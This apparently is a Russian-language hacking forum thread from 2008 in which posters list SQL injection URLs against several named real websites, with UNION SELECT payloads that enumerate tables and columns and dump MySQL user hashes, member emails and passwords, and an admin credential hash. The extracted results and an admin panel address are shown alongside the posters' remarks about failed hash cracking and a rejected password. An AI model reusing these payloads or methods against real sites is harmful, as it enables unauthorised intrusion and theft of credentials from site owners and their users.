http://news.mc.duke.edu/news/article.php?id=10200%20and%201=2%20union%20all%20% 20select%201,2,3,4,5,concat(user,char(58),password ,char(58)),7,8%20from%20mysql.user/*

root:623460e26f081bbc
web:761b2fc844890384

Хеши расшифровать не удалось :(

Tigger

13.01.2008, 21:33

http://www.babwnews.com/article.php?id=-807+union+select+1,2,3,4,5,concat_ws(0x2f,version( ),user(),database()),7,8,9,10,11,12,13,14,15,16/*
4.1.22-standard/babw4_admin@localhost/babw4_A31511
-----------------------------------------------------------------------
http://www.teamfishcake.co.uk/article.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25/*
4.0.27/teamfish_db@localhost/teamfish_site
-----------------------------------------------------------------------
http://www.tayport.org.uk/article.php?id=-75+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5/*
4.1.20/tayportuk@localhost/tayportuk
-----------------------------------------------------------------------
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,concat_ws(0x2f,versio n(),user(),database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61/*
5.0.45-log/basem_m2007@80.243.178.90/basem_m2007
Все таблицы:
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,table_name,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+ from+information_schema.tables/*
Все колонки:
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,column_name,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 +from+information_schema.columns/*
Есть таблица members
В ней есть полезные колонки:
id
email
password
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,ema il,password),8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55,56,57,58,59,60,61+from+members/*
Еще есть таблица poll_user
В ней полезные колонки
user_id
username
userpass
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,concat_ws(0x2f,user_i d,username,userpass),8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61+from+poll_user/*
1/admin/21232f297a57a5a743894a0e4a801fc3- admin
Админка: http://basem.co.uk/admin/
Но пароль не подходит((